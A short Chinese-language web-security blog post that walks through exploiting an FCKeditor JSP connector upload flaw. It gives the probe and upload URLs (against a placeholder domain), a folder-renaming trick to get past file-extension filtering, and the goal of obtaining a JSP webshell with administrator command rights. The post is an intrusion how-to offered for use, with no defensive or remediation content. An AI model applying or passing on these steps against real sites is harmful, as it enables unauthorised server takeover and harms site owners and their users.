- A+
所属分类:WEB安全
http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=%2F
用这个地址查找上传图片的路径,存在漏洞的话应该返回一个xml文件,如图
注意红框的地方,是上传后图片存放的地址。
然后用
http://www.xxx.com/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector
这个地址上传jsp文件,如果网站对上传文件的后缀作了限制,那么就新建一个名字为new的文件夹,修改上面url中的Type=Image为Type=new,把文件上传到这个文件夹,这个文件夹一般就不会对文件后缀作限制了。如图:
如果一切正常的话,利用这个Fckeditor 的漏洞所获得的jsp webshell应该有cmd管理员权限
- 我的微信
- 这是我的微信扫一扫
- 我的微信公众号
- 我的微信公众号扫一扫